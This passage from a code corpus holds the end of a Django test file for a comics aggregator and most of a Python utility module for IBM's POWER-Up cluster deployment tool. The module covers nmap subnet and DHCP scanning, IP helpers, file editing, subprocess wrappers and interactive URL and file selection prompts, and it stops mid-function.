comic2 = Comic.objects.get(slug='sinfest')
self.cc.set_comics_to_crawl(['xkcd', 'sinfest'])
self.assertEquals(2, len(self.cc.comics))
self.assert_(comic1 in self.cc.comics)
self.assert_(comic2 in self.cc.comics)
def test_set_comics_to_crawl_all(self):
all_count = Comic.objects.count()
self.cc.set_comics_to_crawl(None)
self.assertEquals(all_count, len(self.cc.comics))
self.cc.set_comics_to_crawl([])
self.assertEquals(all_count, len(self.cc.comics))
class ComicAggregatorTestCase(TestCase):
def setUp(self):
create_comics()
config = command.AggregatorConfig()
config.set_comics_to_crawl(None)
self.aggregator = command.Aggregator(config)
self.aggregator.identifier = 'slug'
self.comic = mock.Mock()
self.comic.slug = 'slug'
self.crawler_mock = mock.Mock()
self.crawler_mock.comic = self.comic
self.downloader_mock = mock.Mock()
def test_init(self):
self.assertIsInstance(self.aggregator.config, command.AggregatorConfig)
def test_init_optparse_config(self):
optparse_options_mock = mock.Mock()
optparse_options_mock.comic_slugs = None
optparse_options_mock.from_date = None
optparse_options_mock.to_date = None
optparse_options_mock.get.return_value = None
result = command.Aggregator(optparse_options=optparse_options_mock)
self.assertEquals(
len(self.aggregator.config.comics), len(result.config.comics))
self.assertEquals(
self.aggregator.config.from_date, result.config.from_date)
self.assertEquals(
self.aggregator.config.to_date, result.config.to_date)
def test_init_invalid_config(self):
self.assertRaises(AssertionError, command.Aggregator)
def test_crawl_one_comic_one_date(self):
pub_date = datetime.date(2008, 3, 1)
crawler_release = CrawlerRelease(self.comic, pub_date)
self.crawler_mock.get_crawler_release.return_value = crawler_release
self.aggregator._crawl_one_comic_one_date(
self.crawler_mock, pub_date)
self.assertEqual(1, self.crawler_mock.get_crawler_release.call_count)
self.crawler_mock.get_crawler_release.assert_called_with(pub_date)
def test_download_release(self):
crawler_release = CrawlerRelease(self.comic, datetime.date(2008, 3, 1))
self.aggregator._get_downloader = lambda: self.downloader_mock
self.aggregator._download_release(crawler_release)
self.assertEqual(1, self.downloader_mock.download.call_count)
self.downloader_mock.download.assert_called_with(crawler_release)
def test_get_valid_date_from_history_capable(self):
expected = datetime.date(2008, 3, 1)
self.crawler_mock.comic = Comic.objects.get(slug='xkcd')
self.crawler_mock.history_capable = expected
self.crawler_mock.current_date = datetime.date(2008, 4, 1)
result = self.aggregator._get_valid_date(
self.crawler_mock, datetime.date(2008, 2, 1))
self.assertEquals(expected, result)
def test_get_valid_date_from_config(self):
expected = datetime.date(2008, 3, 1)
self.crawler_mock.comic = Comic.objects.get(slug='xkcd')
self.crawler_mock.history_capable = datetime.date(2008, 1, 1)
self.crawler_mock.current_date = datetime.date(2008, 4, 1)
result = self.aggregator._get_valid_date(
self.crawler_mock, expected)
self.assertEquals(expected, result)
def test_get_crawler(self):
pass # TODO
def test_get_downloader(self):
pass # TODO
def test_aggregate_one_comic(self):
pass # TODO
def test_start(self):
pass # TODO
| datagutten/comics | comics/aggregator/tests/test_command.py | Python | agpl-3.0 | 6,333 |
# Copyright 2019 IBM Corp.
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from glob import glob
import os
import re
import sys
import datetime
import subprocess
import fileinput
import readline
from shutil import copy2, copyfile
from subprocess import Popen, PIPE
from netaddr import IPNetwork, IPAddress, IPSet
from tabulate import tabulate
from textwrap import dedent
import hashlib
from distro import linux_distribution
from lib.config import Config
import lib.logger as logger
from lib.exception import UserException
PATTERN_DHCP = r"^\|_*\s+(.+):(.+)"
PATTERN_MAC = r'([\da-fA-F]{2}:){5}[\da-fA-F]{2}'
PATTERN_IP = (r'^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}'
r'(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$')
PATTERN_EMBEDDED_IP = (r'(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}'
r'(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)')
CalledProcessError = subprocess.CalledProcessError
LOG = logger.getlogger()
DHCP_SERVER_CMD = "sudo nmap --script broadcast-dhcp-discover -e {0}"
def parse_dhcp_servers(nmap_response):
""" parse nmap output response
Args:
nmap_response (str): Output of nmap --script broadcast-dhcp-discover -e
Returns:
data (dict): dictionary parsed from data
{'Broadcast Address': '192.168.12.255',
'DHCP Message Type': 'DHCPOFFER',
'Domain Name Server': '192.168.12.2',
'IP Address Lease Time: 0 days, 0:02': '00',
'IP Offered': '192.168.12.249',
'Rebinding Time Value: 0 days, 0:01': '45',
'Renewal Time Value: 0 days, 0:01': '00',
'Router': '192.168.12.3',
'Server Identifier': '192.168.12.2',
'Subnet Mask': '255.255.255.0',
'broadcast-dhcp-discover': ''}
"""
matches = re.findall(PATTERN_DHCP, nmap_response, re.MULTILINE)
data = {a: b.strip() for a, b in matches}
return data
def get_dhcp_servers(interface):
""" get dhcp servers by running nmap
Args:
interface (str): interface to query for dhcp servers
Returns:
output (str): string output of command
"""
cmd = DHCP_SERVER_CMD.format(interface)
output = ""
data = None
try:
output = bash_cmd(cmd)
except Exception as e:
LOG.error("{0}".format(e))
raise e
else:
data = parse_dhcp_servers(output)
return data
def has_dhcp_servers(interface):
""" does interface have dhcp servers
Args:
interface (str): interface to query for dhcp servers
Returns:
isTrue (int): true or false
"""
try:
dct = get_dhcp_servers(interface)
return 'DHCPOFFER' in dct['DHCP Message Type']
except:
pass
return False
def scan_subnet(cidr):
"""Scans a subnet for responding devices.
Args:
cidr (str): subnet in cidr format or can be list of ips separated by
spaces
Returns:
list of tuples of (ip_addr, mac_addr)
"""
cmd = f'sudo nmap -sn {cidr}'
res, err, rc = sub_proc_exec(cmd)
items = []
if rc != 0:
LOG.error(f'Error while scanning subnet {cidr}, rc: {rc}')
for line in res.split('Nmap scan report'):
match = re.search(PATTERN_EMBEDDED_IP, line)
if match:
ip = match.group(0)
match2 = re.search(PATTERN_MAC, line)
if match2:
mac = match2.group(0)
else:
mac = ''
items += [(ip, mac)]
return items
def scan_subnet_for_port_open(cidr, port):
"""Scans a subnet for responding devices.
Args:
cidr (str or list): subnet in cidr format or can be list of ips
separated by spaces.
port (str or int) : tcp port to check
returns: (list): list of tuples with ip and mac address
"""
if isinstance(cidr, list):
cidr = ' '.join(cidr)
cmd = f'sudo nmap -p {port} {cidr}'
res, err, rc = sub_proc_exec(cmd)
items = []
if rc != 0:
LOG.error(f'Error while scanning subnet {cidr}, rc: {rc}')
for line in res.split('Nmap scan report'):
match = re.search(PATTERN_EMBEDDED_IP, line)
if match:
ip = match.group(0)
match2 = re.search(r'\d+/tcp\s+open.+' + rf'({PATTERN_MAC})', line,
re.DOTALL)
if match2:
mac = match2.group(1)
if match2:
items += [(ip, mac)]
return items
def is_ipaddr(ip):
if re.search(PATTERN_IP, ip):
return True
def is_netmask(mask):
from netaddr import AddrFormatError
try:
if IPAddress(mask).is_netmask():
res = True
else:
res = False
except AddrFormatError:
res = False
return res
def get_network_addr(ipaddr, prefix):
""" Return the base address of the subnet in which the ipaddr / prefix
reside.
"""
return str(IPNetwork(f'{ipaddr}/{prefix}').network)
def get_netmask(prefix):
return str(IPNetwork(f'0.0.0.0/{prefix}').netmask)
def get_prefix(netmask):
return IPAddress(netmask).netmask_bits()
def get_network_size(cidr):
""" return the decimal size of the cidr address
"""
return IPNetwork(cidr).size
def add_offset_to_address(addr, offset):
"""calculates an address with an offset added. offset can be negative.
Args:
addr (str): ipv4 or cidr representation of address
offset (int): integer offset
Returns:
addr_.ip (str) address in ipv4 representation
"""
addr_ = IPNetwork(addr)
addr_.value += offset
return str(addr_.ip)
def is_overlapping_addr(subnet1, subnet2):
""" Checks if two ipv4 subnets are overlapping
Inputs:
subnet1,subnet2 (str) ipv4 subnet in cidr format
Returns:
True if the two subnets overlap, False if they do not.
"""
if IPSet([subnet1]).intersection(IPSet([subnet2])):
return True
else:
return False
def bash_cmd(cmd):
"""Run command in Bash subprocess
Args:
cmd (str): Command to run
Returns:
output (str): stdout from command
"""
log = logger.getlogger()
_cmd = ['bash', '-c', cmd]
log.debug('Run subprocess: %s' % ' '.join(_cmd))
output = subprocess.check_output(_cmd, universal_newlines=True,
stderr=subprocess.STDOUT)
try:
output = output.decode('utf-8')
except AttributeError:
pass
log.debug(output)
return output
def backup_file(path, suffix='.orig', multi=True):
"""Save backup copy of file
Backup copy is saved as the name of the original with the value of suffix
appended. If multi is True, and a backup already exists, an additional
backup is made with a numeric index value appended to the name. The backup
copy filemode is set to read-only.
Args:
path (str): Path of file to backup
suffix (str): String to append to the filename of the backup
multi (bin): Set False to only make a backup if one does not exist
already.
"""
log = logger.getlogger()
backup_path = path + suffix
version = 0
while os.path.exists(backup_path) and multi:
version += 1
backup_path += "." + str(version)
log.debug('Make backup copy of orignal file: \'%s\'' % backup_path)
copy2(path, backup_path)
os.chmod(backup_path, 0o444)
def append_line(path, line, check_exists=True):
"""Append line to end of text file
Args:
path (str): Path of file
line (str): String to append
check_exists(bool): Check if line exists before appending
"""
log = logger.getlogger()
log.debug('Add line \'%s\' to file \'%s\'' % (line, path))
if not line.endswith('\n'):
line += '\n'
exists = False
if check_exists:
with open(path, 'r') as file_in:
for read_line in file_in:
if read_line == line:
exists = True
if not exists:
with open(path, 'a') as file_out:
file_out.write(line)
def remove_line(path, regex):
"""Remove line(s) from file containing a regex pattern
Any lines matching the regex pattern will be removed.
Args:
path (str): Path of file
regex (str): Regex pattern
"""
log = logger.getlogger()
log.debug('Remove lines containing regex \'%s\' from file \'%s\'' %
(regex, path))
for line in fileinput.input(path, inplace=1):
if not re.match(regex, line):
print(line, end='')
def line_in_file(path, regex, replace, backup=None):
"""If 'regex' exists in the file specified by path, then replace it with
the value in 'replace'. Else append 'replace' to the end of the file. This
facilitates simplified changing of a parameter to a desired value if it
already exists in the file or adding the paramater if it does not exist.
Inputs:
path (str): path to the file
regex (str): Python regular expression
replace (str): Replacement string
backup (str): If specified, a backup of the orginal file will be made
if a backup does not already exist. The backup is made in the same
directory as the original file by appending the value of backup to
the filename.
"""
if os.path.isfile(path):
if backup:
backup_file(path, multi=False)
try:
with open(path, 'r') as f:
data = f.read()
except FileNotFoundError as exc:
print(f'File not found: {path}. Err: {exc}')
else:
data = data.splitlines()
in_file = False
# open 'r+' to maintain owner
with open(path, 'r+') as f:
for line in data:
in_line = re.search(regex, line)
if in_line:
line = re.sub(regex, replace, line)
in_file = True
f.write(line + '\n')
if not in_file:
f.write(replace + '\n')
def replace_regex(path, regex, replace):
"""Replace line(s) from file containing a regex pattern
Any lines matching the regex pattern will be removed and replaced
with the 'replace' string.
Args:
path (str): Path of file
regex (str): Regex pattern
replace (str): String to replace matching line
"""
log = logger.getlogger()
log.debug('Replace regex \'%s\' with \'%s\' in file \'%s\'' %
(regex, replace, path))
for line in fileinput.input(path, inplace=1):
print(re.sub(regex, replace, line), end='')
def copy_file(source, dest, metadata=True):
"""Copy a file to a given destination
Args:
source (str): Path of source file
dest (str): Destination path to copy file to
metadata (bool, optional): Attempt to preserve file metadata
"""
log = logger.getlogger()
log.debug(f'Copy file, source:{source} dest:{dest} metadata:{metadata}')
if metadata:
copy2(source, dest)
else:
if os.path.isdir(dest):
basename = os.path.basename(source)
dest = os.path.join(dest, basename)
copyfile(source, dest)
def sub_proc_launch(cmd, stdout=PIPE, stderr=PIPE):
"""Launch a subprocess and return the Popen process object.
This is non blocking. This is useful for long running processes.
"""
log = logger.getlogger()
log.debug(f"sub_proc_launch cmd='{cmd}' stdout='{stdout}' stderr='{stderr}'")
proc = Popen(cmd.split(), stdout=stdout, stderr=stderr)
return proc
def sub_proc_exec(cmd, stdout=PIPE, stderr=PIPE, shell=False, env=None):
"""Launch a subprocess wait for the process to finish.
Returns stdout from the process
This is blocking
"""
log = logger.getlogger()
log.debug(f"sub_proc_exec cmd='{cmd}' stdout='{stdout}' stderr='{stderr}' "
f"shell='{shell}' env='{env}'")
if not shell:
cmd = cmd.split()
proc = Popen(cmd, stdout=stdout, stderr=stderr, shell=shell, env=env)
stdout, stderr = proc.communicate()
try:
stdout = stdout.decode('utf-8')
except AttributeError:
pass
try:
stderr = stderr.decode('utf-8')
except AttributeError:
pass
log.debug(f"sub_proc_exec stdout='{stdout}' stderr='{stderr}' "
f"rc='{proc.returncode}'")
return stdout, stderr, proc.returncode
def sub_proc_display(cmd, stdout=None, stderr=None, shell=False, env=None):
"""Popen subprocess created without PIPES to allow subprocess printing
to the parent screen. This is a blocking function.
"""
log = logger.getlogger()
log.debug(f"sub_proc_display cmd='{cmd}' stdout='{stdout}' "
f"stderr='{stderr}' shell='{shell}' env='{env}'")
if not shell:
cmd = cmd.split()
proc = Popen(cmd, stdout=stdout, stderr=stderr, shell=shell, env=env)
proc.wait()
rc = proc.returncode
log.debug(f"sub_proc_display rc='{rc}'")
return rc
def sub_proc_wait(proc):
"""Launch a subprocess and display a simple time counter while waiting.
This is a blocking wait. NOTE: sleeping (time.sleep()) in the wait loop
dramatically reduces performace of the subprocess. It would appear the
subprocess does not get it's own thread.
"""
log = logger.getlogger()
cnt = 0
rc = None
while rc is None:
rc = proc.poll()
print('\rwaiting for process to finish. Time elapsed: {:2}:{:2}:{:2}'.
format(cnt // 3600, cnt % 3600 // 60, cnt % 60), end="")
sys.stdout.flush()
cnt += 1
print('\n')
resp, err = proc.communicate()
log.debug(f"results: resp='{resp}' err='{err}' rc='{rc}'")
print(resp)
return rc
class Color:
black = '\033[90m'
red = '\033[91m'
green = '\033[92m'
yellow = '\033[33m'
brt_yellow = '\033[93m'
blue = '\033[94m'
purple = '\033[95m'
cyan = '\033[96m'
white = '\033[37m'
brt_white = '\033[97m'
bold = '\033[1m'
underline = '\033[4m'
sol = '\033[1G'
clr_to_eol = '\033[K'
clr_to_bot = '\033[J'
scroll_five = '\n\n\n\n\n'
scroll_ten = '\n\n\n\n\n\n\n\n\n\n'
up_one = '\033[1A'
up_five = '\033[5A'
up_ten = '\033[10A'
header1 = ' ' + bold + underline
endc = '\033[0m'
def heading1(text='-', width=79, indent=10):
ind = ''.join([' ' for i in range(indent)])
text1 = f'{ind}{Color.bold}{Color.underline}{text}{Color.endc}'
print(f'\n{text1: <{width + 8}}')
def bold(text):
return Color.bold + text + Color.endc
def rlinput(prompt, prefill=''):
log = logger.getlogger()
log.debug(f"prompt='{repr(prompt)}' prefill='{prefill}'")
readline.set_startup_hook(lambda: readline.insert_text(prefill))
try:
user_input = input(prompt)
log.debug(f"user_input='{user_input}'")
return user_input
finally:
readline.set_startup_hook()
def files_present(url, fileglobs, _all=True):
"""Return true if any/all of the fileglobs are present in the url.
"""
log = logger.getlogger()
any_present = False
all_present = True
fileglobsstr = ','.join(fileglobs)
if fileglobs:
cmd = (f'wget -r -l 10 -nd -np --spider --accept={fileglobsstr} {url}')
reply, err, rc = sub_proc_exec(cmd)
err = err.replace('%2B', '+')
if rc == 0:
for fileglob in fileglobs:
regx = fileglob_to_regx(fileglob)
res = re.findall(regx, err)
log.debug(f"fileglob='{fileglob}' regx='{regx}' res='{res}'")
if len(res) == 0:
all_present = False
log.warning(f"File not found in repo: {fileglob}")
else:
any_present = True
if not fileglobs:
return True
if _all:
return all_present
else:
return any_present
def fileglob_to_regx(fileglob):
regx = fileglob.replace('.', r'\.')
regx = regx.replace('+', r'\+')
regx = regx.replace(']*', '][0-9]{0,3}')
regx = regx.replace('*', '.*')
regx = 'http.+' + regx
return regx
def get_url(url='http://', fileglob='', prompt_name='', repo_chk='',
contains=[], excludes=[], filelist=[]):
"""Input a URL from user. The URL is checked for validity using curl and
wget and the user can continue modifying it indefinitely until a response
is obtained or he can enter 'sss' to skip (stop) entry.
If a fileglob is specified, the specified url is searched
recursively (crawled) up to 10 levels deep looking for matches.
If repo_chk is specified, the url is searched recursively looking for a
marker specific to that repo type. If multiple URL's are found, the
list of found url's is filtered using 'contains', 'excludes' and
'files_present'. The user is again prompted to make a selection.
fileglob and repo_chk are mutually exclusive.
If neither fileglob nor repo_chk are specified, and the url does not end
in '/' then the url is assumed to be looking for a file.
Inputs:
url (str). Valid URLs are http:, https:, and file:
fileglob (str) standard linux fileglobs with *, ? or []
repo_chk (str) 'yum', 'ana' or 'pypi'
contains (list of strings) Filter criteria to be used in combination
with repo_chk. After finding repos of the type in 'repo_chk', the
list is restricted to those urls that contain elements from
'contains' and no elements of 'excludes'.
excludes (list of strings)
filelist (list of strings) Can be globs. Used to validate a repo. The
specified files must be present
prompt_name (str) Used for prompting only.
Output:
url (str) URL for one file or repository directory
"""
from lib.genesis import GEN_SOFTWARE_PATH
print(f'Enter {prompt_name} URL. ("sss" at end of URL to skip)')
if fileglob:
print('Do not include filenames in the URL. A search of the URL')
print('will be made up to 10 levels deep')
while True:
url = rlinput(f'Enter URL: ', url)
if url.endswith('sss'):
url = None
break
if 'artifactory.swg' in url:
fnd_creds = False
while not fnd_creds:
path = os.path.join(GEN_SOFTWARE_PATH, 'artifactory.credentials')
if os.path.isfile(path):
with open(path, 'r') as f:
creds = f.read().rstrip('\n')
fnd_creds = True
else:
print('No artifactory credentials file found')
r = get_selection('Retry\nTerminate Sofware install',
('R', 'T'))
if r == 'T':
sys.exit('PowerUp software install terminated by user')
url = f'https://{creds}{url}'
break
if repo_chk:
url = url if url.endswith('/') else url + '/'
try:
# Basic response test
cmd = f'curl --max-time 2 -I {url}'
url_info, err, rc = sub_proc_exec(cmd)
except:
pass
else:
if 'http:' in url or 'https:' in url:
response = re.search(r'HTTP\/\d+.\d+\s+200\s+ok', url_info,
re.IGNORECASE)
if response:
repo_mrkr = {'yum': '/repodata/', 'ana': 'repodata.json',
'pypi': '/simple/'}
print(response.group(0))
if repo_chk:
ss = repo_mrkr[repo_chk]
elif fileglob:
ss = fileglob
elif url[-1] != '/':
ss = os.path.basename(url)
url = os.path.dirname(url)
cmd = ('wget -r -l 10 -nd -np --spider '
f'--accept={ss} {url}')
reply, err, rc = sub_proc_exec(cmd)
err = err.replace('%2B', '+')
if rc == 0:
if repo_chk:
regx = 'http.+' + repo_mrkr[repo_chk]
elif fileglob:
regx = fileglob_to_regx(fileglob)
_found = re.findall(regx, err)
# remove dups
_found = list(set(_found))
found = []
# Include items containing any element of 'contains'
# and exclude items containing any element of
# 'excludes' If no item meets criteria, then use
# any / all items but include a warning.
if repo_chk:
for _url in _found:
if (any([item for item in contains if item in
_url]) and not any([item for item in
excludes if item
in _url])):
found.append(_url)
if found:
_list = found
elif _found:
_list = _found
if repo_chk:
print(bold('\nWarning. The following url(s) '
'were found but do not match the '
'search criteria'))
else:
_list = []
if _list:
ch, sel = get_selection(_list, allow_none=True)
if ch != 'N':
if repo_chk:
sel = sel.rstrip('/')
url = os.path.dirname(sel)
if files_present(url, filelist):
break
else:
print('\nChosen URL does not appear '
'to be valid. File check '
'failed.')
if get_yesno('Use selection anyway'):
break
else:
url = sel
break
else:
print('No match found.')
else:
print(f'Error reading url. {reply}')
else:
print('Invalid url')
err = re.search('curl: .+', err)
if err:
print(err.group(0))
tmp = re.search(r'HTTP\/\d+.\d+\s+.+', url_info)
if tmp:
print(tmp.group(0))
elif 'file:///' in url:
response = re.search(r'Content-Length:\s+\d+', url_info)
if response:
if repo_chk == 'yum':
ss = '/repodata'
elif repo_chk == 'ana':
ss = '/repodata.json'
elif repo_chk == 'pypi':
ss = '/simple'
if repo_chk:
ss = url + ss
elif fileglob:
ss = url + fileglob
ss = '/' + ss.lstrip('file:/')
files = glob(ss, recursive=True)
if files:
ch, sel = get_selection(files, allow_none=True)
if ch != 'N':
url = 'file://' + os.path.dirname(sel) + '/'
break
else:
print('No match found.')
elif 'file:' in url:
print('Proper file url format: "file:///path/to/file')
response = ''
else:
response = ''
return url
def get_yesno(prompt='', yesno='[y]/n', default=''):
"""Prompts user for a yes or no response.
Args:
prompt(str): Prompt text.
yesno(str): The yes / no part of the user prompt. yesno is
appended to prompt. There must be a '/' in yesno. The
portion of yesno to the left of the '/' is considered the
yes response, the portion to the right of the '/' is
considered to be the no response. By enclosing the yes or no
part of the yesno in brackets you instruct get_yesno to accept
an empty response (nothing or only spaces) as that.
"""
log = logger.getlogger()
log.debug(f"prompt='{repr(prompt)}' yesno='{yesno}' default='{default}'")
try:
def_resp = yesno[1 + yesno.index('['):yesno.index(']')]
except ValueError:
def_resp = ''
yn = yesno.replace('[', '')
yn = yn.replace(']', '')
yn = yn.split('/')
while True:
r = rlinput(f'{prompt}({yesno})? ', default)
if def_resp and not r.strip():
ret = True if def_resp == yn[0] else False
return ret
elif r == yn[0]:
return True
elif r == yn[-1]:
return False
def get_dir(src_dir):
"""Interactive selection of a source dir. Searching starts in the cwd.
Returns:
path (str or None) : Selected path
"""
rows = 10
if not src_dir:
path = os.path.abspath('.')
else:
path = src_dir
# path = os.getcwd()
while True:
path = rlinput(f'Enter an absolute directory location (S to skip): ',
path)
if path == 'S':
return None
if os.path.exists(path):
rpm_filelist = []
non_rpm_filelist = []
print()
top, dirs, files = next(os.walk(path))
files.sort()
rpm_cnt = 0
non_rpm_cnt = 0
for f in files:
if f.endswith('.rpm'):
rpm_filelist.append(f)
rpm_cnt += 1
else:
non_rpm_filelist.append(f)
non_rpm_cnt += 1
cnt = min(10, max(rpm_cnt, non_rpm_cnt))
rpm_filelist += rows * ['']
list1 = rpm_filelist[:cnt]
non_rpm_filelist += rows * ['']
list2 = non_rpm_filelist[:cnt]
print('\n' + bold(path))
print(tabulate(list(zip(list1, list2)),
headers=[bold('RPM Files'),
bold('Other files')], tablefmt='psql'))
if rpm_cnt > 0:
print(bold(f'{rpm_cnt} rpm files found'))
print(f'including the {min(10, rpm_cnt)} files above.\n')
else:
print(bold('No rpm files found\n'))
if non_rpm_cnt > 0:
print(bold(f'{non_rpm_cnt} other files found'))
print(f'including the {min(10, non_rpm_cnt)} files above.')
else:
print(bold('No non rpm files found'))
print('\nSub directories of the entered directory: ')
dirs.sort()
print(dirs)
print(f'\nThe entered path was: {top}')
if get_yesno('Use the entered path '):
return path
def scan_ping_network(network_type='all', config_path=None):
cfg = Config(config_path)
type_ = cfg.get_depl_netw_client_type()
if network_type == 'pxe' or network_type == 'all':
net_type = 'pxe'
idx = type_.index(net_type)
cip = cfg.get_depl_netw_client_cont_ip()[idx]
netprefix = cfg.get_depl_netw_client_prefix()[idx]
cidr_cip = IPNetwork(cip + '/' + str(netprefix))
net_c = str(IPNetwork(cidr_cip).network)
cmd = 'fping -a -r0 -g ' + net_c + '/' + str(netprefix)
result, err, rc = sub_proc_exec(cmd)
print(result)
if network_type == 'ipmi' or network_type == 'all':
net_type = 'ipmi'
idx = type_.index(net_type)
cip = cfg.get_depl_netw_client_cont_ip()[idx]
netprefix = cfg.get_depl_netw_client_prefix()[idx]
cidr_cip = IPNetwork(cip + '/' + str(netprefix))
net_c = str(IPNetwork(cidr_cip).network)
cmd = 'fping -a -r0 -g ' + net_c + '/' + str(netprefix)
result, err, rc = sub_proc_exec(cmd)
print(result)
def get_selection(items, choices=None, prompt='Enter a selection: ', sep='\n',
allow_none=False, allow_retry=False):
"""Prompt user to select a choice. Entered choice can be a member of
choices or items, but a member of choices is always returned as choice. If
choices is not specified a numeric list is generated. Note that if choices
or items is a string it will be 'split' using sep. If you wish to include
sep in the displayed choices or items, an alternate seperator can be
specified.
ex: ch, item = get_selection('Apple pie\nChocolate cake')
ex: ch, item = get_selection('Apple pie.Chocolate cake', 'Item 1.Item 2',
sep='.')
Inputs:
choices (str or list or tuple): Choices. If not specified, a numeric
list is generated.
items (str or list or tuple): Description of choices or items to select
returns:
ch (str): One of the elements in choices
item (str): mathing item from items
"""
log = logger.getlogger()
log.debug(f"items='{repr(items)}' choices='{repr(choices)}' "
f"prompt='{repr(prompt)}' sep='{repr(sep)}' "
f"allow_none='{allow_none}' allow_retry='{allow_retry}'")
if not items:
return None, None
if not isinstance(items, (list, tuple)):
items = items.rstrip(sep)
items = items.split(sep)
if not choices:
choices = [str(i) for i in range(1, 1 + len(items))]
if not isinstance(choices, (list, tuple)):
choices = choices.rstrip(sep)
choices = choices.split(sep)
if allow_none:
choices.append('N')
items.append('Return without making a selection.')
if allow_retry:
choices.append('R')
items.append('Retry the search.')
if len(choices) == 1:
return choices[0], items[0]
maxw = 1
for ch in choices:
maxw = max(maxw, len(ch))
print()
for i in range(min(len(choices), len(items))):
print(bold(f'{choices[i]: <{maxw}}') + ' - ' + items[i])
print()
ch = ' '
while not (ch in choices or ch in items):
ch = input(f'{Color.bold}{prompt}{Color.endc}')
if not (ch in choices or ch in items):
print('Not a valid selection')
print(f'Choose from {choices}')
ch = ' '
if ch not in choices:
# not in choices so it must be in items
ch = choices[items.index(ch)]
item = items[choices.index(ch)]
if item == 'Return without making a selection.':
item = None
print()
log.debug(f"results: ch='{ch}' item='{item}'")
return ch, item
def get_src_path(src_name):
"""Search local disk for src_name and allow interactive selection if more
than one match. Note that the user is not given the option to change the
search criteria. Searching starts recursively in the /home directory and
expands to entire file system if no match in /home.
"""
log = logger.getlogger()
while True:
cmd = (f'find /home -name {src_name}')
resp1, err, rc1 = sub_proc_exec(cmd)
if rc1 != 0:
log.error(f'Error searching for {src_name}')
cmd = (f'find /root -name {src_name}')
resp2, err, rc2 = sub_proc_exec(cmd)
if rc2 != 0:
log.error(f'Error searching for {src_name}')
if rc1 != 0 and rc2 != 0:
return None
resp = resp1 + resp2
if not resp:
cmd = (f'find / -name {src_name}')
resp, err, rc = sub_proc_exec(cmd)
if rc != 0:
log.error(f'Error searching for {src_name}')
return None
if not resp:
print(f'Source file {src_name} not found')
if not get_yesno('Search again', 'y/no', default='y'):
log.error(f'Source file {src_name} not found.\n '
f'{src_name} is not setup in the POWER-Up '
'software server.')
return None
else:
ch, src_path = get_selection(resp,
prompt='Select a source file: ',
allow_none=True, allow_retry=True)
if ch != 'R':
return src_path
else:
ch, src_path = get_selection(resp, prompt='Select a source file: ',
allow_none=True, allow_retry=True)
if ch != 'R':
return src_path
def get_file_path(filename='/home'):
"""Interactive search and selection of a file path.
Returns:
path to file or None
"""
print(bold('\nFile search hints:'))
print('/home/user1/abc.* Search for abc.* under home/user1/')
print('/home/user1/**/abc.* Search recursively for abc.* under '
'/home/user1/')
print('/home/user1/myfile[56].2 Search for myfile5.2 or myfile6.2 under '
'/home/user1/')
print('/home/user1/*/ List directories under /home/user1')
print()
maxl = 10
while True:
print("Enter a file name to search for ('L' to leave without making a "
"selction): ")
filename = rlinput(bold("File: "), filename)
print()
if filename == 'L' or filename == "'L'":
return None
files = glob(filename, recursive=True)
if files:
print(bold(f'Found {len(files)} matching'))
if len(files) > maxl:
print(f'\nSearch returned more than {maxl} items. Showing '
f'first {maxl}')
files = files[:40]
choices = [str(i + 1) for i in range(len(files))]
choices.append('S')
choices.append('L')
files.append('Search again')
files.append('Leave without selecting')
ch, item = get_selection(files, choices)
print()
if item is not None and os.path.isfile(item):
print(f'\n{item}')
if get_yesno("Confirm selection: ", default='y'):
return item
else:
item = 'Search again'
elif item == 'Leave without selecting':
return None
if item != 'Search again':
filename = item
def ansible_pprint(ansible_output):
"""Ansible pretty print
Args:
ansible_output (str): Raw ansible output
Returns:
str: Ansible output formatted for visual parsing
"""
pretty_out = ""
indent_str = " "
indentation = ""
for item in ['{', '}']:
ansible_output = ansible_output.replace(f'{item}', f'\n{item}')
ansible_output = ansible_output.replace(': ["', ':\n["')
ansible_output = ansible_output.replace('\\r\\n"', '"')
ansible_output = ansible_output.replace('\\r\\n', '\n')
ansible_output = ansible_output.replace('\\n', '\n')
ansible_output = ansible_output.replace('\\r', '\n')
index_indent = False
for line in ansible_output.splitlines():
for element in line.split(','):
element = element.lstrip()
if element.startswith('{'):
pretty_out += indentation + "{\n"
indentation += indent_str
element = element[1:]
elif element.startswith('['):
indentation += indent_str
elif element.endswith('}'):
indentation = indentation[len(indent_str):]
if element != '':
pretty_out += indentation[80:] + element + "\n"
if element.count("\"") == 3:
index_indent = True
index = element.find("\"")
index = element.find("\"", index + 1)
index = element.find("\"", index + 1)
indentation += index * ' '
if element.endswith(']'):
indentation = indentation[len(indent_str):]
elif index_indent and element.endswith('"'):
indentation = indentation[index:]
index_indent = False
return pretty_out
def get_col_pos(tbl, hdrs, row_char='-'):
"""Gets the indices for the column positions in a text table
Inputs:
tbl (str): Text table with rows terminated with '\n'
hdrs (tuple of str): Each element of the tuple is a column header. Note
that hdrs are treated at regular expressions. Characters such as
'([{)}]' need to be escaped with a '\'.
row_char (scalar str): Character used in the table row which separates
the headers from the table rows
For example, for the table below, the following call;
get_col_pos(tbl, ('col 1', 'col 2', 'last col'), '-' 'this data')
will return;
{'col 2': (10, 18), 'col 1': (0, 8), 'last col': (20, 30)}
tbl:
'Data from somewhere with a table\n'
'this data has a table with a my col 1, a my col 2, and a last col\n'
'\n'
' my col 2
'my col 1 wraps last col\n'
'-------- -------- ----------\n'
'abcdef ijklm pqrstuvwxy'
"""
log = logger.getlogger()
tbl = tbl.splitlines()
hdr_span = {}
col_idx = {}
for row in tbl:
dashes_span = re.search(fr'{row_char}+\s+{row_char}+', row)
if dashes_span:
dashes_span = list(re.finditer(r'-+', row))
col_span = [x.span() for x in dashes_span]
break
for hdr in hdrs:
idx = re.search(hdr, row, re.IGNORECASE)
if idx:
hdr_span[hdr] = idx.span()
log.debug(f'Seperator row: {repr(row)}')
for hdr in hdr_span:
for col in col_span:
col_idx[hdr] = (0, 0)
if hdr_span[hdr][0] >= col[0] and hdr_span[hdr][1] <= col[1]:
